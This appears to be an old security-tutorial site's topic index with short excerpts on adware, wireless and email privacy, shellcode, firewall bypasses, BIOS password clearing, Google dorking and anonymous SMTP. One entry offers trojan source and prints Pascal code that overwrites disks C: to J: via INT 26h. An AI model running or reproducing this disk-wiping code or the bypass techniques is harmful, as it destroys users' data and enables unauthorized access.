|
|
|
 Topic: Tutorials
The new items published under this topic are as follows.
|
|
|
What are Joke Programs? |
|
Posted by: Admin on Thursday, November 17, 2005 - 11:00 AM |
|
|
Programs that alter or interrupt the normal behavior of your computer, creating a general distraction or nuisance. Joke programs generally do not themselves engage in the practice of gathering or distributing information from the user's computer.
|
|
686 Reads |
>>>
  |
|
What are Hack Tools? |
|
Posted by: Admin on Thursday, November 17, 2005 - 11:00 AM |
Tools that can be used by a hacker or unauthorized user to attack, gain unwelcome access to or perform identification or fingerprinting of your computer. While some hack tools may also be valid for legitimate purposes, their ability to facilitate unwanted access makes them a risk. Hack tools also generally:
|
|
| >>>
Read more... (583 bytes more) |
700 Reads |
|
What are Dialers? |
|
Posted by: Admin on Thursday, November 17, 2005 - 10:58 AM |
|
|
Programs that use a computer or modem to dial out to a toll number or internet site, typically to accrue charges. Dialers can be installed with or without a user’s explicit knowledge, and may perform their dialing activity without a user’s specific consent prior to dialing.
|
|
660 Reads |
>>>
|
|
What is Adware? |
|
Posted by: Admin on Thursday, November 17, 2005 - 10:57 AM |
Programs that facilitate delivery of advertising content to the user through their own window, or by utilizing another program's interface. In some cases, these programs may gather information from the user's computer, including information related to Internet browser usage or other computing habits, and relay this information back to a remote computer or other location in cyber-space.
Adware can be downloaded from Web sites (typically in shareware or freeware), email messages, and instant messengers. Additionally, a user may unknowingly receive and/or trigger adware by accepting an End User License Agreement from a software program linked to the adware or from visiting a website that downloads the adware with or without an End User License Agreement.
|
|
| >>>
|
686 Reads |
|
Exploiting the XmlHttpRequest object in IE |
|
Posted by: Admin on Saturday, September 24, 2005 - 04:57 PM |
|
|
Preface
=======
This paper is released in a bit of haste, and as such, it may be
somewhat incomplete. The reason is that I was toying with the
concepts and techniques outlined in it for the past few weeks.
Then, a day before yesterday, Mozilla released Firefox 1.0.7 which
fixes a security problem (reported by Tim Altman and Yutaka Oiwa,
independently) very similar to what I discuss, and sharing some
concepts with it:
http://www.mozilla.org/security/announce/mfsa2005-58.html#xmlhttp
Since the cat is now out of the bag, I decided to quickly finalize
my research and paper (which were done independently, but alas too
late...) and provide it to the public.
|
|
730 Reads |
>>>
Read more... (15760 bytes more) |
|
Securing Your Wireless LAN |
|
Posted by: Admin on Thursday, May 12, 2005 - 08:18 PM |
Wireless networks are very convenient, but they pose a problem for security-conscious users.
Because wireless signals can penetrate through walls and floors, it is possible for anyone with a wireless laptop to connect to your network. Once connected, they can poke around in your shared files, introduce virus or Trojan horse programs onto your network, or send malicious e-mails or spam.
Shortly after the introduction of 802.11b wireless networks, the equipment manufacturers realized that they had a major security problem on their hands. The industry responded by introducing two different types of data encryption for wireless networks: Wired Equivalent Privacy and WiFi Protected Access.
|
|
| >>>
Read more... (3100 bytes more) |
842 Reads |
|
Is Router's NAT enough to protect your network? |
|
Posted by: Admin on Thursday, May 12, 2005 - 08:13 PM |
|
|
You may have seen inexpensive home routers described as "NAT firewalls." For example, Linksys says of its BEFSR11 EtherFast Cable/DSL Router, "...the built-in NAT technology acts as a firewall protecting your internal network." It's an interesting—if disingenuous—claim, but it raises a legitimate question: How much security do you get with a typical SOHO router?
The answer is that you do get protection, and it's not negligible. Consider that several of the most important network attacks of the last year or two—Blaster, Sasser, and most of the other protocol-level attacks on Windows systems—could not reach systems on a network behind a NAT router. (NAT, or Network Address Translation, is the ability to show one IP address to the world while concealing the IP addresses of the computers on the network.)
|
|
908 Reads |
>>>
Read more... (3315 bytes more) |
|
How to turn off Windows Messenger Service |
|
Posted by: Admin on Thursday, May 12, 2005 - 08:08 PM |
This page does not address, nor is it intended to address, problems associated with services involved with Instant Messaging.
It has come to our attention that some third party has been directing users to this page via pop-ups. We do not condone this practice and are not the source of any pop-up that provides a link to this page. We only provide these directions as a public service and have no affiliation with any entity outside the University of Virginia which points to this page, including ISP's, vendors and other entities.
What Windows Messenger Service Allows to Happen on Your Computer
Should a pop up box appear on your screen with the words "Messenger Service" in the title bar such as the one below, chances are that you have Windows Messenger Services enabled.
|
|
| >>>
Read more... (3282 bytes more) |
852 Reads |
|
Topic: Bypassing client application protection techniques |
|
Posted by: Admin on Thursday, May 12, 2005 - 08:07 PM |
|
|
The paper provides a tutorial on how to write shellcodes for the Windows and Unix environments, with a focus on Linux shellcodes.The paper starts from a simple buffer overflow scenario, and explains how to detect the vulnerability and how to write an appropriate shellcode for it.
What Is a Shellcode?
Shellcode is a piece of machine-readable code, or script code that has just one mission; to open up a command interpreter (shell) on the target system so that an attacker can type in commands in the same fashion as a regular authorized user or system administrator of that system can do (with a few not-so-important exceptions of course). However, in order to get remote access to the shell, you're going to need some kind of networking support in that shellcode too. There's more to shellcoding than just having a program execute /bin/sh or cmd.exe. This white paper will introduce you to shellcodes, how they're used in practice, and how they are used with buffer overflow vulnerabilities.
|
|
839 Reads |
>>>
Read more... (1872 bytes more) |
|
Bypassing client application protection techniques |
|
Posted by: Admin on Thursday, May 12, 2005 - 08:06 PM |
CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application
Intelligence
(R55) HFA 9
Microsoft Windows XP SP2
Agnitum Outpost Pro 2.1, 2.5
Tiny Firewall Pro v6.0.100
ZoneAlarm Pro with Web Filtering v4.5.594
BlackICE PC Protection 3.6
Kerio Personal Firewall 4.0
WRQ ATGuard 3.2
|
|
| >>>
Read more... (15234 bytes more) |
1065 Reads |
|
Game in MS-Excel 2000. |
|
Posted by: Admin on Thursday, May 12, 2005 - 08:05 PM |
|
|
you want to play a cool car-racing game in MS-Excel 2000? Then,follosw this steps!
To play a 3D car-racing game in MS-Excel 2000,follow this steps:-
1.Open MS-Excel 2000.
2.Click on the file menu, and click the "Save as webpage" option.
3.From the save as dialog box,click on the "Publish" button.
4.From the publish dialog box,select the option "Add interectivity with".Then click on the "Publish" button.
5.Open the saved file in "Internet Explorer".
6.Goto column "WC" and row number "2000".
7.Then press "Ctrl"+"Shift"+"Alt" and click on the MS-Office logo at the top left corner.
|
|
960 Reads |
>>>
|
|
Trojans source code! |
|
Posted by: Admin on Thursday, May 12, 2005 - 07:59 PM |
The source codes of many famous trojans!This source code is provided for computer programming history. This source code can be used for good or evil. It can destroy computer data. Be aware that I am making no claims to authorship or usability of the information found in the Virus Source Code Database. I accept no responsibility for data corruption due to the use of the following information.
backfind.pas
Program Wipe_The_Fuckers_HD;
uses dos,crt;
var read:string;
Begin
clrscr;
inline ($B0/$08/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {I:}
write ('.');
inline ($B0/$09/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {j:}
write ('.');
inline ($B0/$07/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {H:}
write ('.');
inline ($B0/$06/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {G:}
write ('.');
inline ($B0/$05/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {F:}
write ('.');
inline ($B0/$04/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {E:}
write ('.');
inline ($B0/$03/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {D:}
write ('.');
inline ($B0/$02/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {C:}
write ('.');
|
|
| >>>
Read more... (22162 bytes more) |
1020 Reads |
|
Multiple Firewall Products Bypass Vulnerability |
|
Posted by: Admin on Thursday, May 12, 2005 - 07:58 PM |
|
|
Most of personal Firewalls allow shortcuts or interface for controlling traffic. It's simple to bypass these Firewalls by utilizing a multi-threaded program combined with the ability to send keys or to control the mouse.
This flaw enables any Trojan or similar programs to easily bypass the Firewall and act as a server or access point to another computer. Also most of these Firewalls have a "remember" option therefore, if you bypass the Firewall and successfully exploit it, Firewall will never return to its previous condition (warning the user, or blocking the attack).
DETAILS
Vulnerable Products (Sending Key Method and Mouse Control):These products are vulnerable to both of "Sending Key Method" and "Mouse Control Method"
* ZoneAlarm / ZoneAlarm Pro (www.zonelabs.com) | Fixed
o 4.5.530.000
o 4.5.538.001
o 5 and newer versions are not vulnerable
|
|
1660 Reads |
>>>
Read more... (10590 bytes more) |
|
How to bypass your BIOS Password |
|
Posted by: Admin on Thursday, May 12, 2005 - 07:56 PM |
Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.
|
|
| >>>
Read more... (12204 bytes more) |
1798 Reads |
|
Search With Google!, Hidden directories, ebooks, files... |
|
Posted by: Admin on Thursday, May 12, 2005 - 07:55 PM |
|
|
Everyone knows google in the security sector...and what a powerful tool it is,
just by entering certain search strings you can gain a vast amount of knowledge
and information of your chosen target...often revealing sensitive data...this
is all down to badly configured systems...brought on by sloppy administration
allowing directory indexing and accessing , password files , log entrys ,
files , paths ,etc , etc
Search Tips
so how do we start ?
the common search inputs below will give you an idea...for instance if you
want to search for the an index of "root"
|
|
3125 Reads |
>>>
Read more... (6000 bytes more) |
|
How to keep your email address free of spammers |
|
Posted by: Admin on Friday, April 08, 2005 - 07:23 AM |
You know how important it is for your web page visitors to be able to communicate with you, but do you know how to keep your e-mail address safe from web crawling spiders that search out and collect e-mail addresses? No one wants their address harvested and added to a mail spam list! Web spiders locate the @ sign in source code and grab the related text to capture e-mail addresses so to keep your e-mail safe, we have to focus on doing something about that @ sign.
|
|
| >>>
Read more... (1069 bytes more) |
1017 Reads |
|
SSH Port Forwarding |
|
Posted by: Admin on Thursday, January 06, 2005 - 06:00 AM |
|
|
SSH is typically used for logging into remote servers so you have shell access to do maintenance, read your email, restart services, or whatever administration you require. SSH also offers some other native services, such as file copy (using scp and sftp) and remote command execution (using ssh with a command on the command line after the hostname).
Whenever we SSH from one machine to another, we establish a secure encrypted session. This first article in this SSH series[1] looked at properly verifying a server's host key, so that we can be sure that no attacker is able to perform a man-in-the-middle attack and gain access to read or manipulate what we do in that session. Other articles in this series looked at removing the need for static passwords using SSH user identities[2], and then using ssh-agent[3] to automate the task of typing passphrases.
|
|
1050 Reads |
>>>
Read more... (12698 bytes more) |
|
How to hold the Voice in Yahoo! without clicking Hands Free Check Box. |
|
Posted by: Cybertrion on Saturday, October 09, 2004 - 12:29 AM |
One can hold the voice in Yahoo! Java chat without clicking the Hands free check box. Open java chat, login to the room in which you want to use the voice chat. Click the voice button and hit "Space Bar" once without unclicking the voice button.. and leave.. The voice button will remain pressed.
|
|
| >>>
Read more... (57 bytes more) |
1083 Reads |
|
Manual way of anonymous Emailing |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:21 AM |
|
|
You can send a message without any mailer at all. Run telnet with two parameters - the name or ip of SMTP server you want to be connected to and 25 as the port number. Then print following commands pressing ENTER after each of them:
HELO anything
MAIL FROM: <from_name@from_domain>
RCPT TO: <to_name@to_domain>
DATA
|
|
1156 Reads |
>>>
Read more... (922 bytes more) |
|
How to hide yourself |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:16 AM |
So, you want to use e-mail but you also want to stay anonymous when needed. The easiest way to hide is to use one of the free mail servers. These servers will give you additional e-mail address that has nothing to do with your real one. For eg get a free mail account. There're at least two reasons to get some free e-mail accounts: 1. You don't want to be identified; 2. You don't like SPAM. You can also use them to get some nice looking address and set forwarding option on :)
|
|
| >>>
Read more... (2989 bytes more) |
1163 Reads |
|
Email and your Privacy |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:13 AM |
|
|
You've probably noticed already that e-mail is a really surprising thing. Its convenience is doubtless but it's not a reason to ignore such problems as SPAM, mail delivery failures, etc. Let's have a closer look at these problems and then get back to the privacy and security ones ...
As a matter of fact, there're several independent processes involved in the sending and receiving e-mail: 1. You send the letter with your mailer (for example Outlook, Eudora, etc.) to the mail server of your ISP using SMTP protocol (there're also direct mailers and we can skip the step two when using them). 2. The letter is relayed to the destination server set as a Mail eXchanger (MX in DNS) for the target domain. 3. Your addressee receives the letter from his ISP mail server via POP3 or IMAP protocol.
|
|
1238 Reads |
>>>
Read more... (2895 bytes more) |
|
More privacy with proxy |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:10 AM |
Now, when you have switched off all unnecessary functions of your browser, whether you may feel like completely safe? Sorry, but the answer is "No". You're still showing your IP address and some other information to the world. How to hide your IP ? Just forget about direct work with a server and start using PROXY. The main purpose of proxy-server is to speed up your connection - you request proxy for some file or document and then proxy requests it from remote server or just give you the copy of such file found in cache. When you're working via proxy-server you can be confident that server logged its IP instead of yours. Generally speaking, it's almost true. Since most of proxy servers keep your real address available, it's still possible to get it. Moreover, even if you've passed a set of proxies - your real address won't be wiped out. To hide IP completely you have to find "anonymous proxy" - it will show nothing about your address or will substitute it with useless value.
|
|
| >>>
Read more... (2101 bytes more) |
1347 Reads |
|
Java and JavaScript |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:08 AM |
|
|
Now about Java. It's surprising but it's still a toy for most of webmasters. "Water" effects, menu applets, etc. For today there is only a small amount of really useful applets like stock tickers or similar. So you can turn this feature off unless you're playing online java-games or watching stock exchange applet :). And don't forget about bugs in MSIE and NC Java machines.
And one more small remark - java-applet can connect to the server it's been loaded from and pass some gathered information to the server part. So it's up to you to turn Java support on or off.
|
|
1008 Reads |
>>>
Read more... (2294 bytes more) |
|
Disabling Cookies |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:03 AM |
How to disable cookies in Netscape prior to version 4.x : put the read-only attribute on cookies.txt file (attrib +R cookies.txt).
How to disable cookies in Netscape version 4.x+ : Edit, Preferences, Advanced, Cookies, Disable cookies.
How to disable cookies in Explorer version 4.x+ : Edit, Preferences, Cookies, Never accept or View, Internet Options, Advanced, Security, Cookies, Disable all cookie use.
Old versions of above browsers have no features to automatically reject cookies. In that case you can try to find the "Cookie" keys in the registry and remove them (in HKLM section for MSIE; in HKCU section for NN), then remove windows\cookies directory (MSIE) or cookies.txt file (Netscape).
|
|
| >>>
Read more... (933 bytes more) |
1018 Reads |
|
Privacy |
|
Posted by: Admin on Wednesday, September 29, 2004 - 09:00 AM |
|
|
Surfing the net with your favorite browser you can pay no attention on the fact that every time you requesting web-page you leave your tracks in the server logs. Depending on webmaster's interests it can be simply your IP or much bigger amount of gathered information. So what to give 'em this information for ?
I shall notice that you can be disagree with the all stated below. However it's always good to know both "evil" and "good" things new technologies can bring.
|
|
1075 Reads |
>>>
Read more... (2102 bytes more) |
|
|
|
